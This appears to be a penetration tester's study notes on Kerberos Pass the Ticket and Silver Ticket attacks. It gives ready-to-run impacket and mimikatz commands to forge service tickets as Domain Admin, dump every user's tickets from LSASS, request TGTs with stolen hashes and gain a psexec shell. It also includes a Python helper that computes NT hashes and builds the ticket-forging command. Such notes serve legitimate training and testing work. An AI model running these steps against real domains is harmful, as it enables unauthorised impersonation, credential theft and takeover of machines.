Pass the Ticket

A TGS (service ticket) is bound to one SPN, so it only works against that service; a TGT can be used to request a TGS for any service. Both are exportable: unlike Overpass the Hash, which needs the account's NT hash or AES key to request a fresh TGT, Pass the Ticket needs only the ticket itself, which can be exported from one host and re-injected on another host on the network and used to authenticate (to that one service for a TGS, to anything for a TGT), for as long as the ticket is valid.

Pass-the-Ticket (PtT) involves grabbing an existing Kerberos ticket and using it to impersonate a user. Mimikatz can dump either the current user's Kerberos tickets or, with debug/SYSTEM privileges, the tickets of every user with a session on the system (if Kerberos unconstrained delegation is configured on that host, it also holds the TGTs of every user who authenticated to it, which could be a big deal). Once acquired, the tickets can be injected with Mimikatz and used to access resources for the remainder of the ticket lifetime.

💡 crackmapexec can also use a ccache file: export KRB5CCNAME=<file>.ccache and add --use-kcache.

Prerequisites

  • For the final psexec step: access to the admin share “Admin$”, i.e. local administrative rights on the target machine for the user the ticket claims to be (a silver ticket forged as RID 500 / Domain Admins covers this).
  • NTLM (RC4) hash of the account running the service: the computer account (machine$) for CIFS/HOST, or a user account for IIS, SQL Server, etc. Kerberoasting can yield it: crack the service account's password offline, then compute the NT hash from it.

On Kali

❗ TO COMPLETE

Get TGS

💡 See Impacket-Ticketer. Get domain SID with Enum4Linux.

The Silver Ticket attack forges a valid TGS for one service once the NTLM hash of the account running that service is known (for CIFS/HOST/RPCSS this is the computer account hash, machine$). The service validates the ticket only with its own key and never contacts the DC, so the forged PAC can claim any user and any group membership, giving access to that service as any user. See HackTricks.

Optional – Get Domain SID

On a domain-joined Windows host with the ActiveDirectory module, Get-ADDomain prints it in the DomainSID field:

powershell Get-ADDomain

From Kali, use enum4linux; the domain SID is printed near the top (the “Getting domain SID” step runs in every mode). No need for a full report, so limit output with -P (password policy only).

enum4linux -P -u $USER -p $PASS $IP

Optional – Get SPN

This lists SPNs bound to user accounts (the Kerberoastable ones); add -request to also fetch the TGS hashes for offline cracking. Computer account SPNs (CIFS/HOST) are not listed here; for those the target is simply <service>/<host FQDN>.

impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -outputfile SPNs.txt

Generate Silver Ticket

The -spn argument is service/host in SPN form (e.g. cifs/machine.example.com, with the host FQDN), not a port. The user name at the end is arbitrary; ticketer defaults the PAC to RID 500 with the Domain Admins / Enterprise Admins groups, and writes <user>.ccache in the current directory.

NTLM=<NTLM hash of the service account, e.g. machine$>
DOMAIN_SID="S-1-5-21-1339291983-1349129144-367733775"
DOMAIN=example.com
SPN=cifs/machine.example.com
impacket-ticketer -nthash $NTLM -domain-sid $DOMAIN_SID -domain $DOMAIN -spn $SPN baduser

Use Silver Ticket

The host in the target (machine.${DOMAIN}) must be the same name as in the SPN and must resolve from Kali (add it to /etc/hosts if needed); Kerberos also needs the clock within 5 minutes of the target. psexec uses SMB, so the ticket must be for the CIFS service of that host.

export KRB5CCNAME=baduser.ccache
impacket-psexec ${DOMAIN}/baduser@machine.${DOMAIN} -k -no-pass

Get Kerberos TGT tickets

❗ Not needed for a silver ticket (that ticket is forged, the DC is never asked). This is Overpass the Hash: request a legitimate TGT with the password or NT hash, then use it the same way (KRB5CCNAME + -k -no-pass). getTGT writes ${USER}.ccache in the current directory.

IP=x.x.x.x
DC_IP=y.y.y.y
HASH=abc...def
USER=myuser
DOMAIN=example.com
PASS=MyPassword
impacket-getTGT -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}

Can also pass the hash to get it 😉 (-hashes takes LM:NT, the LM part can be left empty)

impacket-getTGT -dc-ip $DC_IP -hashes :${HASH} ${DOMAIN}/${USER}

On Windows

Get Domain name

systeminfo | findstr /B /C:"Domain"

Get SID of current user

Example: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-YYYY, where the domain SID is S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX and the user RID is YYYY.

❗ Need to be logged in as a domain user: a local account's SID has the same S-1-5-21-… shape but its prefix is the machine SID, not the domain SID, so it looks valid and is wrong. Use “rdesktop -d $DOMAIN” (or DOMAIN\user at logon)!!!

whoami /user

Generate the RC4 hash from password

A silver ticket requires the service account's password hash, not the cleartext password. The RC4 Kerberos key is simply the NT hash (MD4 of the UTF-16LE password), so if you already have the NT hash (e.g. from secretsdump) this step can be skipped. Adding /user and /domain makes mimikatz print the AES keys as well.

mimikatz.exe
kerberos::hash /password:MyPassword
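The three inputs above can be prepared on the Kali side without mimikatz. The following is an added example, not code from the original notes, from impacket or from mimikatz: it splits a SID from whoami /user into domain SID and RID (and flags the local-account case when the domain SID is already known from enum4linux), derives the RC4/NT hash that kerberos::hash prints using a self-contained MD4, and builds the impacket-ticketer command line with a checked service/host SPN. The sample SID, password and hostnames are constructed placeholders.

```python
import re
import struct

# Added example (not from the original notes, impacket or mimikatz).
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). Pure Python so it works even where OpenSSL's
    legacy provider is off and hashlib.new('md4') raises."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)          # 64-bit little-endian length

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """RC4-HMAC Kerberos key == NT hash == MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16le")).hex()


_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")


def split_sid(user_sid: str, expected_domain_sid: str = ""):
    """Return (domain_sid, rid). A local account SID has the same shape
    (machine SID + RID), so pass the domain SID from enum4linux when you
    have it and a mismatch is reported instead of silently forging a bad ticket."""
    sid = user_sid.strip()
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not an account SID: {user_sid!r}")
    domain_sid, rid = sid.rsplit("-", 1)[0], int(m.group(1))
    if expected_domain_sid and domain_sid != expected_domain_sid:
        raise ValueError(f"{sid} belongs to {domain_sid}, not {expected_domain_sid} "
                         "(logged in with a local account?)")
    return domain_sid, rid


def ticketer_args(nthash: str, domain_sid: str, domain: str, spn: str, user: str) -> list:
    """argv for impacket-ticketer; the SPN must be service/host.fqdn."""
    if not re.fullmatch(r"[0-9a-fA-F]{32}", nthash):
        raise ValueError("NT hash must be 32 hex chars")
    svc, _, host = spn.partition("/")
    if not svc or "." not in host:
        raise ValueError(f"SPN must be service/host.fqdn, got {spn!r}")
    return ["impacket-ticketer", "-nthash", nthash, "-domain-sid", domain_sid,
            "-domain", domain, "-spn", spn, user]


if __name__ == "__main__":
    # constructed sample values, not from a real domain
    dom, rid = split_sid("S-1-5-21-1339291983-1349129144-367733775-1105")
    print(" ".join(ticketer_args(nt_hash("MyPassword"), dom, "example.com",
                                 "cifs/machine.example.com", "baduser")))
```

split_sid raises rather than returning a machine SID, which is the mistake the ❗ note above is about; ticketer_args rejects the host:port style of SPN because impacket-ticketer expects service/host and the host must match the name later given to psexec.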

Generate a silver ticket for a service (like IIS, SQL Server, etc.)

Also see Mimikatz. The command says “golden” but with /target and /service it forges a silver ticket. /target is the host part of the SPN (FQDN), /service its service class (CIFS, HTTP, MSSQLSvc, …), /rc4 the service account's NT hash; /ptt loads the ticket straight into the current session (use /ticket:<file> instead to write it to disk).

mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<host FQDN from the SPN> /service:HTTP /rc4:<password RC4 hash> /ptt
kerberos::list

A new service ticket for the SPN is now loaded in memory with whatever group membership was forged into its PAC. By default mimikatz sets the user RID to 500 (the domain Administrator account) and adds several highly privileged groups such as Domain Admins, so the service application sees the caller as that account and those groups; /id and /groups override the defaults.

Export the ticket(s) to .kirbi files if you want to use them from Kali, then copy the files over.

kerberos::list /export

Convert from Mimikatz (.kirbi) format to the ccache format used by Impacket.

impacket-ticketConverter $TICKET_KIRBI $TICKET_CCACHE

Not tested: dump every ticket held in LSASS (all logged-on users, not just the current one); requires privilege::debug or SYSTEM.

mimikatz.exe
privilege::debug
sekurlsa::tickets /export

Transfer the generated .kirbi files to Kali and convert.

impacket-ticketConverter ticket.kirbi ticket.ccache